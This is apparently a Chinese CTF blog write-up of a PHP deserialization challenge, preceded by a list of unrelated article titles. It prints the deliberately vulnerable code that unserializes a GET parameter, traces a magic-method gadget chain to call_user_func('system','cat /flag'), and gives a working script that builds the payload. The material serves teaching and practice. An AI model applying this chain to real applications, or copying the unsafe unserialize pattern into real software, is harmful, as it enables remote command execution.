- 1ElasticSearch 索引设计指南_es索引
- 2C++初阶学习第五弹——类与对象(下)
- 3linux进程及作业管理实验,2018-2019-1 20189221《Linux内核原理与分析》第一周作业
- 4利用ESP32-C3将TF卡内容变成U盘进行读取_esp32 u盘
- 5【解决】Hadoop部署完成后无法通过浏览器访问_部署的hadoop用浏览器访问不了
- 6keras模型融合_keras特征融合
- 7在IntelliJ IDEA14中安装go语言插件
- 8银河麒麟服务器 linux 设置 固定IP地址_银河麒麟应用虚拟化服务器地址
- 9图解python | Anaconda安装与环境设置_linux anaconda安装
- 10Linux操作系统Python3.11回退为Python3.8_python降级到3.8
CTF之旅WEB篇(3)--ezunser PHP反序列化
赞
踩
一、审题
对方朝你扔过来一串代码(当然这次又是蹭的题只说过程和思路):
- <?php
- highlight_file(__FILE__);
- class A{
- public $name;
- public $age;
-
- public function __destruct(){
- call_user_func($this->age,'');
- }
- }
-
- class AAA{
- public $debug;
-
- public function __invoke(){
-
- echo $this->debug;
- }
- public function __toString(){
- return $this->debug;
- }
- }
-
-
-
- class B{
-
- public $func;
- public $arg;
- public function backdoor(){
- call_user_func($this->func,$this->arg."");
- }
-
-
- }
-
- class BBB{
- public $kkk;
- public $lll;
- public function __toString(){
- $this->kkk->backdoor();
- return "ok";
- }
-
- }
-
- if(isset($_GET['a'])){
- unserialize($_GET['a']);
- }
好的,一眼又是我们的php反序列化,开审之前我们先复习复习我们的php中的魔术方法,建议先去看一遍我先前的一篇文章:
shutTD的CTF之旅WEB篇(2)--NewStarCTF 公开赛UnserializeOne详解_shutTD的博客-CSDN博客
好的复习完成,我们继续我们的反序列化,首先第一步找出我们的目标函数,也就是这个 call_user_func()函数,这个函数可以执行任意代码,详情使用的方法建议直接去查,在这我们的最终目的就是要执行到call_user_func('system','cat /flag') (至于为什么直接执行cat /flag,问就是经验哈哈,不过还是可以通过ls等命令查看找出flag的位置)
二、找到反序列化入口,从入口延申向下
在A类中发现__destruct(),所以这就是我们的入口,因此我们第一步实例化一个A的对象:
$res = new A();跟进__destruct():
- public function __destruct(){
- call_user_func($this->age,'');
- }
call_user_func($this->age,'')即执行age类的某个方法,所以我们很自然的想到__invoke()方法,所以我们在AAA类中发现该方法,因此我们的第二步就是:
$res->age = new AAA();跟进__invoke():
- public function __invoke(){
-
- echo $this->debug;
- }
看到echo我们直接想到能够触发__toString()方法,所以我们在BBB类中发现有__toString()方法,因此我们第三步就是:
$res->age->debug = new BBB();跟进__toString():
- public function __toString(){
- $this->kkk->backdoor();
- return "ok";
- }
发现调用了kkk属性的backdoor()方法,我们搜索一下哪个类中有此方法,在B类中我们发现此方法且刚好我们的目标函数就在这其中,马上就快到终点了,所以我们第四步就是:
$res->age->debug->kkk = new B();三、调整思路,编写脚本
因为我们需要达到call_user_func('system','cat /flag'),所以我们的类B中属性应为:
- class B{
-
- public $func = 'system';
- public $arg = 'cat /flag';
- public function backdoor(){
- call_user_func($this->func,$this->arg."");
- }
-
-
- }
好的大功告成,开始编写脚本:
- <?php
- class A{
- public $name;
- public $age;
- }
-
- class AAA{
- public $debug;
- }
-
-
-
- class B{
-
- public $func='system';
- public $arg='cat /flag';
- }
-
- class BBB{
- public $kkk;
- public $lll;
- }
- $res=new A();
- $res->age=new AAA();
- $res->age->debug=new BBB();
- $res->age->debug->kkk=new B();
- echo serialize($res);
直接参数a等于序列化字符get提交即可获取flag啦!
四、总结
总的来说这道题思路还是很清晰的,是算偏易的题了不过新手拿来练手还是可以的逻辑很清晰,建议看完这篇文章后自己再试着做一遍哦!
